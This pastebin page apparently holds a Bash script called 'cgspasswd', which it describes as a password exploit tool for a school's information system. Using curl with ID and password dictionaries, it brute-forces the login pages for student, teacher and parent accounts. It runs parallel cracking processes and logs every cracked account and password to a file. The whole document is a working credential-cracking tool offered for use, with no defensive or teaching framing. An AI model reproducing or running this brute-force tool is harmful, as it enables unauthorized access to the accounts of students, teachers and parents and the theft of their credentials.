Re: Untitled

From Subtle Bison, 6 Years ago, written in Bash, viewed 994 times. This paste is a reply to Untitled from Morose Curlew - view diff
URL https://code.nat.moe/view/a6446d03 Embed
Download Paste or View Raw
  1. #!/bin/bash
  2.  
  3. # cgspasswd - Country Gardern School Password exploit tool
  4. # cgspasswd is a free software, maintaince by MagicNAT Networing
  5. # Version 0.6.2 (C) MagicNAT Networking
  6. #
  7. # MUTIL-PROCESS HELP
  8. #
  9. # The mutiple process function is currently in development. You can still use it. However it
  10. # might cause some problems.
  11. #
  12. # To use MP mode, create a dir with you id dict or password dict in it, cgspasswd will start
  13. # different process for each dict files in it.
  14. #
  15. # DEFINATIONS
  16. #
  17. # id: The id of student, teacher, or parent
  18. # passwd: The passwd of student, teacher, or parent
  19. # type: The type of id, could be tea, stu, or par, stand for student, teacher, and parent
  20. # verbose: Set this to get into verbose mode. Showing all password or id tried
  21. #
  22. # cgspasswd CONFIGURE
  23. #
  24. # URL_PREFIX: The prefix of url
  25. # URL_EXTENTION: The extention of url
  26. # WEEK_PASSWD_DICT: The path to week id dict
  27. # ID_DICT: The path to ID dict
  28. # PW_DICT: The path to Password dict
  29. # ID_MP_DICT: The path to ID dict dir when using mutilple process
  30. # PW_MP_DICT: The path to Password dict dir when using mutilple process
  31. # CRACK_MP_PID: The path to pid dir of MP cracking work
  32. # WEEKPW_MP_PID: The path to pid dir of MP weekpw exploit work
  33. # CRACKED_SAVE: The path to the file to save cracked accounts
  34.  
  35. function pre_config {
  36. URL_PREFIX="http://127.0.0.1:8080/mis/info/tea_info/"
  37. URL_EXTENTION="_Login.asp"
  38. WEEK_PASSWD_DICT="./dicts/wpw.dict"
  39. ID_DICT="./dicts/id.dict"
  40. PW_DICT="./dicts/pw.dict"
  41. ID_MP_DICT="./dicts/ids/"
  42. PW_MP_DICT="./dicts/pws/"
  43. #CRACK_MP_PID="./.crack_mp.pid/"
  44. #WEEKPW_MP_PID="./.weekpw_mp.pid/"
  45. CRACKED_SAVE="./cracked.txt"
  46. }
  47.  
  48.  
  49. function config {
  50.         [[ -z $1 ]] && echo "config: Missing parameter" && return 1
  51.         case $1 in
  52.                 URL_PREFIX)
  53.                         [[ -z $2 ]] && echo $1=$URL_PREFIX && return 0
  54.                         URL_PREFIX=$2
  55.                 ;;
  56.                 URL_EXTENTION)
  57.                         [[ -z $2 ]] && echo $1=$URL_EXTENTION && return 0
  58.                         URL_EXTENTION=$2
  59.                 ;;
  60.                 WEEK_PASSWD_DICT)
  61.                         [[ -z $2 ]] && echo $1=$WEEK_PW_DICT && return 0
  62.                         WEEK_PASSWD_DICT=$2
  63.                 ;;
  64.                 ID_DICT)
  65.                         [[ -z $2 ]] && echo $1=$ID_DICT && return 0
  66.                         ID_DICT=$2
  67.                 ;;
  68.                 PW_DICT)
  69.                         [[ -z $2 ]] && echo $1=$PW_DICT && return 0
  70.                         PW_DICT=$2
  71.                 ;;
  72.                 ID_MP_DICT)
  73.                         [[ -z $2 ]] && echo $1=$ID_MP_DICT && return 0
  74.                         ID_MP_DICT=$2
  75.                 ;;
  76.                 PW_MP_DICT)
  77.                         [[ -z $2 ]] && echo $1=$PW_MP_DICT && return 0
  78.                         PW_MP_DICT=$2
  79.                 ;;
  80. #               CRACK_MP_PID)
  81. #                       [[ -z $2 ]] && echo $1=$CRACK_MP_PID && return 0
  82. #                       CRACK_MP_PID=$2
  83. #               ;;
  84. #               WEEKPW_MP_PID)
  85. #                       [[ -z $2 ]] && echo $1=$WEEKPW_MP_PID && return 0
  86. #                       WEEKPW_MP_PID=$2
  87. #               ;;
  88.                 CRACKED_SAVE)
  89.                         [[ -z $2 ]] && echo $1=$CRACKED_SAVE && return 0
  90.                         CRACKED_SAVE=$2
  91.                 ;;
  92.                 reset)
  93.                         echo -n "Reset config with pre_config... "
  94.                         pre_config
  95.                         echo "OK"
  96.                 ;;
  97.         esac
  98.         chk_conf
  99. }
  100.  
  101. # help: Get help, usage: help [topic]
  102.  
  103. function help {
  104.         [[ -z $* ]] && echo -e "\n Available topics are: config, chk_login, chk_cracked, weekpw[_mp], crack[_mp]\n mp, new\n" && return 0
  105.         case $1 in
  106.                 config)
  107. #                       echo -e "\n CGSPASSWD CONFIGURE\n\n URL_PREFIX: The prefix of url\n URL_EXTENTION: The extention of url\n WEEK_PASSWD_DICT: The path to week id dict\n ID_DICT: The path to ID dict\n PW_DICT: The path to Password dict\n ID_MP_DICT: The path to ID dict dir when using mutilple process\n PW_MP_DICT: The path to Password dict dir when using mutilple process\n CRACK_MP_PID: The path to pid dir of MP cracking work\n WEEKPW_MP_PID: The path to pid dir of MP weekpw exploit work\n CRACKED_SAVE: The path to the file to save cracked accounts\n\n Usage: config <item> [value]\n      config reset\n"
  108.                         echo -e "\n CGSPASSWD CONFIGURE\n\n URL_PREFIX: The prefix of url\n URL_EXTENTION: The extention of url\n WEEK_PASSWD_DICT: The path to week id dict\n ID_DICT: The path to ID dict\n PW_DICT: The path to Password dict\n ID_MP_DICT: The path to ID dict dir when using mutilple process\n PW_MP_DICT: The path to Password dict dir when using mutilple process\n CRACKED_SAVE: The path to the file to save cracked accounts\n\n Usage: config <item> [value]\n     config reset\n"
  109.  
  110.                 ;;
  111.                 chk_login)
  112.                         echo -e "\n Check a login, usage: chk_login <id> <passwd> <type>\n id: The id of student, teacher, or parent\n passwd: The passwd of student, teacher, or parent\n type: The type of id, could be tea, stu, or par, stand for student, teacher, \n and parent\n"
  113.                 ;;
  114.                 chk_cracked)
  115.                         echo -e "\n Check for the logins that already cracked for failure\n Usage: chk_cracked [verbose]\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
  116.                 ;;
  117.                 weekpw|weekpw_mp)
  118.                         echo -e "\n weekpw[_mp]: Find week passwords with id dict and weekpasswd dict\n Usage: weekpw[_mp] <type> [verbose]\n using '_mp' will enable Mutli-Process, see help mp for more informations.\n type: The type of id, could be tea, stu, or par, stand for student, teacher,\n and parent\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
  119.                 ;;
  120.                 crack|crack_mp)
  121.                         echo -e "\n crack[_mp]: Crack the password of an id.\n Usage: crack[_mp] <id> <type> [verbose]\n using '_mp' will enable Mutli-Process, see help mp for more informations.\n id: The id of student, teacher, or parent\n type: The type of id, could be tea, stu, or par, stand for student, teacher,\n and parent\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
  122.                 ;;
  123.                 mp)
  124.                         echo -e "\n MUTIL-PROCESS HELP\n \n The mutiple process function is currently in development. You can still use \n it. However it might cause some problems. \n\n To use MP mode, create a dir with you id dict or password dict in it, \n cgspasswd will start different process for each dict files in it.\n"
  125.                 ;;
  126.                 new)
  127.                         echo -e "\n new: Start a command in backgound.\n This will be helpful when you are trying to runing mutil tasks.\n Usage: new <command> \n"
  128.                 ;;
  129.                 *)
  130.                         echo -e "\n Help topic $1 not found. $(help)\n"
  131.                 ;;
  132.                 esac
  133. }
  134.  
  135. # chk_login: Check a login, usage: chk_login <id> <passwd> <type>
  136.  
  137. function chk_login {
  138.         [[ -z $3 ]] && echo "chk_login: Missing parameters" && return 1
  139.         [[ ! -z $(curl --data "t1=$1&t2=$2" $URL_PREFIX$3$URL_EXTENTION 2> /dev/null | grep moved) ]] && echo "true" && return 0
  140.         echo "false" && return 1
  141. }
  142.  
  143. # chk_cracked: Check for the logins that already cracked for failurem, usage: chk_cracked [verbose]
  144.  
  145. function chk_cracked {
  146.         [[ ! -e $CRACKED_SAVE ]] && echo "chk_cracked: Cracked account file $CRACKED_SAVE not exist." && return 1
  147.         ACCTLIST=$(cat creaked.txt | sed -e "s/.*Type //g" | sed -e "s/ ID //g" | sed -e "s/ Password //g")
  148.         for acct in $ACCTLIST
  149.         do
  150.                 typ=$(echo $acct | awk -F, '{print $1}')
  151.                 id=$(echo $acct | awk -F, '{print $2}')
  152.                 passwd=$(echo $acct | awk -F, '{print $3}')
  153.                 [[ ! -z $1 ]] && echo -n "Tesing login $id($typ) with $passwd... "
  154.                 [[ $(chk_login $id $passwd $typ) == "false" ]] && echo "Account $id, type $typ, is not able to login with $psswd now." || echo "OK"
  155.         done
  156. }
  157.  
  158. # weekpw: Find week passwords with id dict and weekpasswd dict, usage: weekpw <type> [verbose]
  159.  
  160. function weekpw {
  161.         [[ -z $1 ]] && echo "weekpw: Missing parameters" && return 1
  162.         for id in $( cat $ID_DICT )
  163.         do
  164.                 for passwd in $(cat $WEEK_PASSWD_DICT)
  165.                 do
  166.                         [[ ! -z $2 ]] && echo "Trying login $id($1) with $passwd... "
  167.                         [[ $( chk_login $id $passwd $1 ) == "true" ]] && write_cracked $id $passwd $1 && break
  168.                 done
  169.         done
  170. }
  171.  
  172. # weekpw_mp: Find week passwords with id dicts and weekpasswd dict using MP, usage: weekpw_mp <type> [verbose]
  173.  
  174. function weekpw_mp {
  175.         [[ -z $1 ]] && echo "weekpw_mp: Missing parameters" && return 1
  176.         for dict in $(ls $ID_MP_DICT)
  177.         do
  178.                 weekpw_mp_core $ID_MP_DICT$dict $1 $2 &
  179.         done
  180. }
  181.  
  182. # Internal function, core module of weekpw_mp, should not be called by user.
  183.  
  184. function weekpw_mp_core {
  185.         [[ -z $2 ]] && echo "weekpw_mp_core: Missing parameters" && return 1
  186.         #echo $$ > $WEEKPW_MP_PID$$
  187.         for id in $(cat $1)
  188.         do
  189.                 for passwd in $(cat $WEEK_PASSWD_DICT)
  190.                 do
  191.                         [[ ! -z $3 ]] && echo "Trying login $id($2) with $passwd... "
  192.                         [[ $( chk_login $id $passwd $2 ) == "true" ]] && write_cracked $id $passwd $2 && break
  193.                 done
  194.         done
  195.         #rm $WEEKPW_MP_PID$$
  196. }
  197.  
  198. # crack: Crack the password of an id, usage: crack <id> <type> [verbose]
  199.  
  200. function crack {
  201.         [[ -z $2 ]] && echo "crack: Missing parameters" && return 1
  202.         for passwd in $(cat $PW_DICT)
  203.         do
  204.                 [[ ! -z $3 ]] && echo "Trying login $1($2) with $passwd... "
  205.                 [[ $( chk_login $1 $passwd $2 ) == "true" ]] && write_cracked $1 $passwd $2 && break
  206.         done
  207. }
  208.  
  209. # crack_mp: Crack the password of an id using MP, usage: crack <id> <type> [verbose]
  210.  
  211. function crack_mp {
  212.         [[ -z $2 ]] && echo "crack_mp: Missing parameters" && return 1
  213.         for dict in $(ls $PW_MP_DICT)
  214.         do
  215.                 crack_mp_core $PW_MP_DICT$dict $1 $2 $3 &
  216.         done
  217.  
  218. }
  219.  
  220. # Internal function, core module of crack_mp, should not be called by user.
  221.  
  222. function crack_mp_core {
  223.         [[ -z $3 ]] && echo "crack_mp_core: Missing parameters" && return 1
  224.         #echo $$ > $CRACK_MP_PID$$
  225.         for passwd in $(cat $1)
  226.         do
  227.                 [[ ! -z $4 ]] && echo "Trying login $2($3) with $passwd... "
  228.                 [[ $( chk_login $2 $passwd $3 ) == "true" ]] && write_cracked $2 $passwd $3 && break
  229.         done
  230.         #rm $CRACK_MP_PID$$
  231. }
  232.  
  233. # Internal function, write creaked account, should not be called by user.
  234.  
  235. function write_cracked {
  236.         [[ -z $3 ]] && echo "write_cracked: Missing parameters" && return 1
  237.         MSG="[$(date)] CRACKED: Type $3, ID $1, Password $2"
  238.         echo $MSG
  239.         echo $MSG >> $CRACKED_SAVE
  240.         return 0
  241. }
  242.  
  243. # Interactive mode
  244.  
  245. function interactive {
  246.         echo "cgspasswd 0.6 (Interactive mode) "
  247.         echo "Copyright 2014 MagicNAT Networking"
  248.         echo "This is free software with ABSOLUTELY NO WARRANTY."
  249.         echo "For help, type help"
  250.         while true
  251.         do
  252.                 echo -n "cgspasswd> "; read cmd;
  253.                 if [[ ! -z $cmd ]]
  254.                 then
  255.                         exe=$(echo $cmd | awk '{print $1}')
  256.                         if ! type "$exe" > /dev/null 2> /dev/null
  257.                         then
  258.                                 echo "cgspasswd: command not found: $exe"
  259.                         else
  260.                                 $cmd
  261.                         fi
  262.                 fi
  263.         done
  264. }
  265.  
  266. # Init cgspasswd
  267.  
  268. function cgsinit {
  269.         pre_config
  270.         chk_conf
  271. #       mpinit
  272. }
  273.  
  274. # Config check
  275.  
  276. function chk_conf {
  277.         for files in $WEEK_PASSWD_DICT $ID_DICT $PW_DICT $ID_MP_DICT $PW_MP_DICT
  278.         do
  279.         #       [[ ! -e $files || -z $URL_PREFIX || -z $URL_EXTENTION || -z $CRACK_MP_PID || -z $WEEKPW_MP_PID ]] && echo "Something wrong, cgspasswd will now exit." && exit 1
  280.                 [[ ! -e $files || -z $URL_PREFIX || -z $URL_EXTENTION ]] && echo "Something wrong, cgspasswd will now exit." && exit 1  
  281.         done
  282. }
  283.  
  284. # Init MP mode
  285. #
  286. #function mpinit {
  287. #       mkdir $WEEKPW_MP_PID
  288. #       mkdir $CRACK_MP_PID
  289. #}
  290.  
  291. # new: Start a command background, usage: new <cmd>
  292.  
  293. function new {
  294.         [[ -z $* ]] && return 0
  295.         if ! type "$1" > /dev/null 2> /dev/null
  296.         then
  297.                 echo "new: command not found: $*"
  298.         else
  299.                 $* &
  300.         fi
  301.  
  302. }
  303.  
  304. # exit cgspasswd
  305.  
  306. function exit {
  307.         pkill -9 -P $$ > /dev/null 2> /dev/null
  308.         kill -9 $$ > /dev/null 2> /dev/null
  309. }
  310.  
  311. # Main function
  312.  
  313. function main {
  314.         cgsinit
  315.         trap 'exit' 2 3 15
  316.         [[ -z $* ]] && interactive
  317.         $*
  318. }
  319.  
  320. # Call main
  321.  
  322. main $*

Replies to Re: Untitled rss

Title Name Language When
Re: Re: Untitled Chocolate Cassowary bash 6 Years ago.

Reply to "Re: Untitled"

Here you can reply to the paste above

captcha